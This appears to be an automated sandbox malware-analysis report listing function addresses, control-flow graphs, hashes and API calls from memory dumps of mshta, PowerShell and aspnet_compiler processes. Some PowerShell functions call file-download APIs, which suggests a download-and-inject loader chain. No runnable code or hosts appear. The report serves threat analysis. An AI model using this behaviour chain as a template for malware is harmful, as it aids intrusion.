                                                              Function 03710FC1 Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000003.486458372.0000000003710000.00000010.00000800.00020000.00000000.sdmp, Offset: 03710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_3_3710000_mshta.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction ID: 914ee7696ae93fc050cb1dedcf4af5c544521fb5725d4104c1f1b2ea27c0a460
                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction Fuzzy Hash:
                                                              Function 03710FB1 Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000003.486458372.0000000003710000.00000010.00000800.00020000.00000000.sdmp, Offset: 03710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_3_3710000_mshta.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction ID: 914ee7696ae93fc050cb1dedcf4af5c544521fb5725d4104c1f1b2ea27c0a460
                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction Fuzzy Hash:
                                                              Function 03710FB9 Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000003.486458372.0000000003710000.00000010.00000800.00020000.00000000.sdmp, Offset: 03710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_3_3710000_mshta.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction ID: 914ee7696ae93fc050cb1dedcf4af5c544521fb5725d4104c1f1b2ea27c0a460
                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction Fuzzy Hash:

                                                              Execution Graph

                                                              Execution Coverage:4.1%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:4
                                                              Total number of Limit Nodes:0
                                                              execution_graph 3822 7fe899a7c25 3823 7fe899a7c33 3822->3823 3824 7fe899a7be3 URLDownloadToFileW 3823->3824 3825 7fe899a7c00 3823->3825 3824->3825

                                                              Executed Functions

                                                              Function 000007FE899A7018 Relevance: 1.6, APIs: 1, Instructions: 129filenetworkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.513407020.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7fe899a0000_powershell.jbxd
                                                              Similarity
                                                              • API ID: DownloadFile
                                                              • String ID:
                                                              • API String ID: 1407266417-0
                                                              • Opcode ID: b878349b1419e71d44cd3ddc00d0fd8adc81aab1dcc509571ef076a0d8e702e6
                                                              • Instruction ID: 3a61c58217f2151ccb82cd49688b0d179211d10b52a62bee557fdb6c09b42e8f
                                                              • Opcode Fuzzy Hash: b878349b1419e71d44cd3ddc00d0fd8adc81aab1dcc509571ef076a0d8e702e6
                                                              • Instruction Fuzzy Hash: 3E31917191CA5C9FDB58EF5CD8857A9B7E1FB59311F00826ED04DD3661CB70B8068B81
                                                              Function 000007FE89A7566D Relevance: 1.7, Strings: 1, Instructions: 467COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 7fe89a7566d-7fe89a75677 1 7fe89a75679 0->1 2 7fe89a7567e-7fe89a7568f 0->2 1->2 5 7fe89a7567b 1->5 3 7fe89a75696-7fe89a756a7 2->3 4 7fe89a75691 2->4 7 7fe89a756a9 3->7 8 7fe89a756ae-7fe89a756bf 3->8 4->3 6 7fe89a75693 4->6 5->2 6->3 7->8 9 7fe89a756ab 7->9 10 7fe89a756c6-7fe89a756d7 8->10 11 7fe89a756c1 8->11 9->8 13 7fe89a756d9 10->13 14 7fe89a756de-7fe89a756f2 10->14 11->10 12 7fe89a756c3 11->12 12->10 13->14 15 7fe89a756db 13->15 16 7fe89a7570e-7fe89a75715 14->16 17 7fe89a756f4-7fe89a756f8 14->17 15->14 18 7fe89a75716-7fe89a7571a 16->18 19 7fe89a756f9-7fe89a756fa 17->19 20 7fe89a7571c-7fe89a75720 17->20 18->20 19->18 23 7fe89a756fc-7fe89a7570d 19->23 21 7fe89a75778-7fe89a7579a 20->21 22 7fe89a75722-7fe89a75777 20->22 24 7fe89a757a0-7fe89a757aa 21->24 25 7fe89a75903-7fe89a759cc 21->25 22->21 23->16 26 7fe89a757ac-7fe89a757b9 24->26 27 7fe89a757c3-7fe89a757c8 24->27 26->27 28 7fe89a757bb-7fe89a757c1 26->28 29 7fe89a757ce-7fe89a757d1 27->29 30 7fe89a758a3-7fe89a758ad 27->30 28->27 34 7fe89a75816 29->34 35 7fe89a757d3-7fe89a757e2 29->35 32 7fe89a758be-7fe89a758ce 30->32 33 7fe89a758af-7fe89a758bd 30->33 37 7fe89a758db-7fe89a75900 32->37 38 7fe89a758d0-7fe89a758d4 32->38 39 7fe89a75818-7fe89a7581a 34->39 35->25 47 7fe89a757e8-7fe89a757f2 35->47 37->25 38->37 39->30 41 7fe89a75820-7fe89a75826 39->41 44 7fe89a75828-7fe89a75835 41->44 45 7fe89a75842-7fe89a75884 41->45 44->45 50 7fe89a75837-7fe89a75840 44->50 58 7fe89a7588a-7fe89a758a2 45->58 48 7fe89a7580b-7fe89a75814 47->48 49 7fe89a757f4-7fe89a75801 47->49 48->39 49->48 51 7fe89a75803-7fe89a75809 49->51 50->45 51->48
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.513536017.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7fe89a70000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: V
                                                              • API String ID: 0-1342839628
                                                              • Opcode ID: c22e1714468e943e8ed72e408856851086381c3644480bcb5bf3e133fb28a2a3
                                                              • Instruction ID: 9d5889554a5b990a7c541a00f9860e81d23b30ca41acfae20a8f41de75a7e07c
                                                              • Opcode Fuzzy Hash: c22e1714468e943e8ed72e408856851086381c3644480bcb5bf3e133fb28a2a3
                                                              • Instruction Fuzzy Hash: 48D1063180E7C92FD34797389C156A67FA4EF47260F0911EBD48DC70A3E619AD5AC3A2
                                                              Function 000007FE899A7AE1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.513407020.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7fe899a0000_powershell.jbxd
                                                              Similarity
                                                              • API ID: DownloadFile
                                                              • String ID:
                                                              • API String ID: 1407266417-0
                                                              • Opcode ID: 9d152b5c096c8588f3d5c03842f8cd64440e76f2d849722289f0ef4d4f592bed
                                                              • Instruction ID: af85bc2c7650ea663aad5d2b185252519e16bf38f8e3e5b2e73dcd71df745be7
                                                              • Opcode Fuzzy Hash: 9d152b5c096c8588f3d5c03842f8cd64440e76f2d849722289f0ef4d4f592bed
                                                              • Instruction Fuzzy Hash: 4341F57180CB889FDB1ADB589C457AABBF0FB56321F0482AFD089D7562CB646806C781
                                                              Function 000007FE899A7C25 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.513407020.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7fe899a0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3f98e69aeef59372468395d9b89db6c353bb149ff94e886eff455c374c63039
                                                              • Instruction ID: 2f40b776701f2aed647b17949f7f4669a379162bc79373887525e32368086722
                                                              • Opcode Fuzzy Hash: a3f98e69aeef59372468395d9b89db6c353bb149ff94e886eff455c374c63039
                                                              • Instruction Fuzzy Hash: 1A21922190D3D14EE317A768AC516E87FB0EF03228F0941E7C0998B4F3D619645AC766
                                                              Function 000007FE89A78549 Relevance: .7, Instructions: 711COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 101 7fe89a78549-7fe89a7856a 102 7fe89a78586-7fe89a785f9 101->102 103 7fe89a7856c-7fe89a78585 101->103 104 7fe89a78add-7fe89a78b96 102->104 105 7fe89a785ff-7fe89a78609 102->105 103->102 106 7fe89a7860b-7fe89a78618 105->106 107 7fe89a78622-7fe89a78629 105->107 106->107 109 7fe89a7861a-7fe89a78620 106->109 110 7fe89a7862b-7fe89a7863e 107->110 111 7fe89a78640 107->111 109->107 112 7fe89a78642-7fe89a78644 110->112 111->112 113 7fe89a78a58-7fe89a78a62 112->113 114 7fe89a7864a-7fe89a78656 112->114 118 7fe89a78a64-7fe89a78a74 113->118 119 7fe89a78a75-7fe89a78a85 113->119 114->104 117 7fe89a7865c-7fe89a78666 114->117 120 7fe89a78668-7fe89a78675 117->120 121 7fe89a78682-7fe89a78692 117->121 123 7fe89a78a87-7fe89a78a8b 119->123 124 7fe89a78a92-7fe89a78adc 119->124 120->121 125 7fe89a78677-7fe89a78680 120->125 121->113 130 7fe89a78698-7fe89a786cc 121->130 123->124 125->121 130->113 135 7fe89a786d2-7fe89a786de 130->135 135->104 136 7fe89a786e4-7fe89a786ee 135->136 137 7fe89a78707-7fe89a7870c 136->137 138 7fe89a786f0-7fe89a786fd 136->138 137->113 140 7fe89a78712-7fe89a78717 137->140 138->137 139 7fe89a786ff-7fe89a78705 138->139 139->137 140->113 141 7fe89a7871d-7fe89a78722 140->141 141->113 143 7fe89a78728-7fe89a78737 141->143 144 7fe89a78747 143->144 145 7fe89a78739-7fe89a78743 143->145 148 7fe89a7874c-7fe89a78759 144->148 146 7fe89a78763-7fe89a787ee 145->146 147 7fe89a78745 145->147 155 7fe89a787f0-7fe89a787fb 146->155 156 7fe89a78802-7fe89a78824 146->156 147->148 148->146 150 7fe89a7875b-7fe89a78761 148->150 150->146 155->156 157 7fe89a78826-7fe89a78830 156->157 158 7fe89a78834 156->158 159 7fe89a78850-7fe89a788de 157->159 160 7fe89a78832 157->160 161 7fe89a78839-7fe89a78846 158->161 168 7fe89a788e0-7fe89a788eb 159->168 169 7fe89a788f2-7fe89a78910 159->169 160->161 161->159 162 7fe89a78848-7fe89a7884e 161->162 162->159 168->169 170 7fe89a78920 169->170 171 7fe89a78912-7fe89a7891c 169->171 174 7fe89a78925-7fe89a78933 170->174 172 7fe89a7893d-7fe89a789cd 171->172 173 7fe89a7891e 171->173 181 7fe89a789cf-7fe89a789da 172->181 182 7fe89a789e1-7fe89a78a3a 172->182 173->174 174->172 175 7fe89a78935-7fe89a7893b 174->175 175->172 181->182 185 7fe89a78a42-7fe89a78a57 182->185
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.513536017.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7fe89a70000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7cc611bf83dc69eae18c41b4ab38ffd9bd6945c63afce9346cccb5e9e50168a9
                                                              • Instruction ID: bae75edaed28a471bc26721c7a09732e68c6ac0d45fd9b7fcae5a1182d28291f
                                                              • Opcode Fuzzy Hash: 7cc611bf83dc69eae18c41b4ab38ffd9bd6945c63afce9346cccb5e9e50168a9
                                                              • Instruction Fuzzy Hash: 0222E53090CB895FD79ADB2C84956697FE2FF8A344F2401EED48EC72A3DA24AC55C741
                                                              Function 000007FE89A74165 Relevance: .4, Instructions: 432COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 186 7fe89a74165-7fe89a741f4 187 7fe89a74457-7fe89a74516 186->187 188 7fe89a741fa-7fe89a74204 186->188 189 7fe89a74206-7fe89a74213 188->189 190 7fe89a7421d-7fe89a74222 188->190 189->190 191 7fe89a74215-7fe89a7421b 189->191 193 7fe89a74228-7fe89a7422b 190->193 194 7fe89a743fb-7fe89a74405 190->194 191->190 195 7fe89a7422d-7fe89a74240 193->195 196 7fe89a74242 193->196 197 7fe89a74407-7fe89a74413 194->197 198 7fe89a74414-7fe89a74424 194->198 201 7fe89a74244-7fe89a74246 195->201 196->201 202 7fe89a74426-7fe89a7442a 198->202 203 7fe89a74431-7fe89a74454 198->203 201->194 204 7fe89a7424c-7fe89a74280 201->204 202->203 203->187 210 7fe89a74297 204->210 211 7fe89a74282-7fe89a74295 204->211 213 7fe89a74299-7fe89a7429b 210->213 211->213 213->194 215 7fe89a742a1-7fe89a742a9 213->215 215->187 216 7fe89a742af-7fe89a742b9 215->216 217 7fe89a742bb-7fe89a742c8 216->217 218 7fe89a742d5-7fe89a742e5 216->218 217->218 219 7fe89a742ca-7fe89a742d3 217->219 218->194 222 7fe89a742eb-7fe89a7431c 218->222 219->218 222->194 225 7fe89a74322-7fe89a7434e 222->225 227 7fe89a74350-7fe89a74372 225->227 228 7fe89a74374 225->228 229 7fe89a74376-7fe89a74378 227->229 228->229 229->194 231 7fe89a7437e-7fe89a74386 229->231 232 7fe89a74396 231->232 233 7fe89a74388-7fe89a74392 231->233 237 7fe89a7439b-7fe89a743a8 232->237 235 7fe89a743b2-7fe89a743e1 233->235 236 7fe89a74394 233->236 241 7fe89a743e8-7fe89a743fa 235->241 236->237 237->235 238 7fe89a743aa-7fe89a743b0 237->238 238->235
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.513536017.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7fe89a70000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 476a9d9d4a5259a54c46b8a93139e2953ec1ef9add67e0fa1dd25b7bfb56e49a
                                                              • Instruction ID: 69cb20a5fdd683c2d0c8ff96c8b0f11868f15cea279077c395290c6d9c80adbf
                                                              • Opcode Fuzzy Hash: 476a9d9d4a5259a54c46b8a93139e2953ec1ef9add67e0fa1dd25b7bfb56e49a
                                                              • Instruction Fuzzy Hash: CBC1693090DBCA4FE74AA76C54116B97FE2EF46744F1901EBD48EC71A3D618AC26C3A1
                                                              Function 000007FE89A70F63 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 242 7fe89a70f63-7fe89a70f96 243 7fe89a71098-7fe89a710dc 242->243 244 7fe89a70f9c-7fe89a70fa6 242->244 251 7fe89a710ed-7fe89a71124 243->251 252 7fe89a710de-7fe89a710ec 243->252 245 7fe89a70fa8-7fe89a70fb5 244->245 246 7fe89a70fbf-7fe89a70fee 244->246 245->246 248 7fe89a70fb7-7fe89a70fbd 245->248 246->243 257 7fe89a70ff4-7fe89a70ffe 246->257 248->246 255 7fe89a7112a-7fe89a7119e 251->255 256 7fe89a711c1-7fe89a711cb 251->256 252->251 275 7fe89a711a6-7fe89a711be 255->275 258 7fe89a711d8-7fe89a711e8 256->258 259 7fe89a711cd-7fe89a711d7 256->259 260 7fe89a71017-7fe89a71077 257->260 261 7fe89a71000-7fe89a7100d 257->261 262 7fe89a711ea-7fe89a711ee 258->262 263 7fe89a711f5-7fe89a7121a 258->263 272 7fe89a71079-7fe89a71084 260->272 273 7fe89a7108b-7fe89a71097 260->273 261->260 265 7fe89a7100f-7fe89a71015 261->265 262->263 265->260 272->273 275->256
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.513536017.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7fe89a70000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bed5fa948109818ca6db39e582507eae2600c451e72d87265b9574fd3229820b
                                                              • Instruction ID: 03bd351a035485ee8a8698a7d2bae750f3d6c6b80b025238d6de839a969d96ab
                                                              • Opcode Fuzzy Hash: bed5fa948109818ca6db39e582507eae2600c451e72d87265b9574fd3229820b
                                                              • Instruction Fuzzy Hash: C291E321A0DBC90FE757973C58642657FE1EF4B254F2901EBC48ECB1A3EA189C6AC351

                                                              Non-executed Functions

                                                              Function 000007FE89A7352E Relevance: .3, Instructions: 332COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.513536017.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7fe89a70000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ebeeb5e57b128f4a4ea4cf01e862b2c4994f5ce321b9facfd9f1e0b336a343d8
                                                              • Instruction ID: 965b5f3236090c6cd7794a83c9b87bbd7166b69944895c8b717bdc1a056d85f1
                                                              • Opcode Fuzzy Hash: ebeeb5e57b128f4a4ea4cf01e862b2c4994f5ce321b9facfd9f1e0b336a343d8
                                                              • Instruction Fuzzy Hash: E7A1352080EBC91FD747A778A8146A63FF1EF47254F1A01EBD48DCB1A3D6199D1AC362

                                                              Execution Graph

                                                              Execution Coverage:1.1%
                                                              Dynamic/Decrypted Code Coverage:4.4%
                                                              Signature Coverage:7%
                                                              Total number of Nodes:114
                                                              Total number of Limit Nodes:11
                                                              execution_graph 77383 424243 77384 42425f 77383->77384 77385 424287 77384->77385 77386 42429b 77384->77386 77387 42bda3 NtClose 77385->77387 77393 42bda3 77386->77393 77389 424290 77387->77389 77390 4242a4 77396 42def3 RtlAllocateHeap 77390->77396 77392 4242af 77394 42bdc0 77393->77394 77395 42bdce NtClose 77394->77395 77395->77390 77396->77392 77478 4245d3 77482 4245ec 77478->77482 77479 424637 77480 42ddd3 RtlFreeHeap 77479->77480 77481 424647 77480->77481 77482->77479 77483 424677 77482->77483 77485 42467c 77482->77485 77484 42ddd3 RtlFreeHeap 77483->77484 77484->77485 77486 42ef93 77487 42efa3 77486->77487 77488 42efa9 77486->77488 77491 42deb3 77488->77491 77490 42efcf 77494 42c0a3 77491->77494 77493 42dece 77493->77490 77495 42c0bd 77494->77495 77496 42c0cb RtlAllocateHeap 77495->77496 77496->77493 77497 42b413 77498 42b42d 77497->77498 77501 a8fdc0 LdrInitializeThunk 77498->77501 77499 42b452 77501->77499 77397 413583 77401 4135a3 77397->77401 77399 41360c 77400 413602 77401->77399 77402 41aca3 RtlFreeHeap LdrInitializeThunk 77401->77402 77402->77400 77403 4133a3 77406 42c013 77403->77406 77407 42c030 77406->77407 77410 a8fb68 LdrInitializeThunk 77407->77410 77408 4133c2 77410->77408 77502 41dd53 77503 41dd79 77502->77503 77507 41de70 77503->77507 77508 42f0c3 77503->77508 77505 41de11 77506 42b463 LdrInitializeThunk 77505->77506 77505->77507 77506->77507 77509 42f033 77508->77509 77510 42f090 77509->77510 77511 42deb3 RtlAllocateHeap 77509->77511 77510->77505 77512 42f06d 77511->77512 77513 42ddd3 RtlFreeHeap 77512->77513 77513->77510 77514 423d96 77515 423d9c 77514->77515 77516 423e23 77515->77516 77517 423e38 77515->77517 77518 42bda3 NtClose 77516->77518 77519 42bda3 NtClose 77517->77519 77520 423e2c 77518->77520 77522 423e41 77519->77522 77521 423e78 77522->77521 77523 42ddd3 RtlFreeHeap 77522->77523 77524 423e6c 77523->77524 77411 401ae8 77412 401afe 77411->77412 77415 42f463 77412->77415 77413 401b72 77413->77413 77418 42d993 77415->77418 77419 42d9b9 77418->77419 77428 407263 77419->77428 77421 42d9cf 77427 42da2b 77421->77427 77431 41a993 77421->77431 77423 42da03 77442 42c123 77423->77442 77424 42d9ee 77424->77423 77425 42c123 ExitProcess 77424->77425 77425->77423 77427->77413 77445 415d33 77428->77445 77430 407270 77430->77421 77432 41a9bf 77431->77432 77467 41a883 77432->77467 77435 41aa04 77437 41aa20 77435->77437 77440 42bda3 NtClose 77435->77440 77436 41a9ec 77438 41a9f7 77436->77438 77439 42bda3 NtClose 77436->77439 77437->77424 77438->77424 77439->77438 77441 41aa16 77440->77441 77441->77424 77443 42c140 77442->77443 77444 42c14e ExitProcess 77443->77444 77444->77427 77446 415d4d 77445->77446 77448 415d63 77446->77448 77449 42c7a3 77446->77449 77448->77430 77451 42c7bd 77449->77451 77450 42c7ec 77450->77448 77451->77450 77456 42b463 77451->77456 77457 42b47d 77456->77457 77463 a8fae8 LdrInitializeThunk 77457->77463 77458 42b4a6 77460 42ddd3 77458->77460 77464 42c0e3 77460->77464 77462 42c859 77462->77448 77463->77458 77465 42c0fd 77464->77465 77466 42c10b RtlFreeHeap 77465->77466 77466->77462 77468 41a979 77467->77468 77469 41a89d 77467->77469 77468->77435 77468->77436 77473 42b4f3 77469->77473 77472 42bda3 NtClose 77472->77468 77474 42b50d 77473->77474 77477 a907ac LdrInitializeThunk 77474->77477 77475 41a96d 77475->77472 77477->77475 77525 a8f9f0 LdrInitializeThunk

                                                              Executed Functions

                                                              Function 0042BDA3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 34 42bda3-42bddc call 404593 call 42cf73 NtClose
                                                              APIs
                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BDD7
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_aspnet_compiler.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                              • Instruction ID: d90ea754d99db2d9abd4fcdc73495245e7fae96ad713b828660b781994584198
                                                              • Opcode Fuzzy Hash: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                              • Instruction Fuzzy Hash: CDE04F712403147BC610AA5AEC41F9B776CDBC5714F004069FA0C67181C7B5BA1487F4
                                                              Function 00A907AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 48 a907ac-a907c1 LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                              Function 00A8F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 44 a8f9f0-a8fa05 LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                              Function 00A8FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 45 a8fae8-a8fafd LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                              Function 00A8FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 46 a8fb68-a8fb7d LdrInitializeThunk
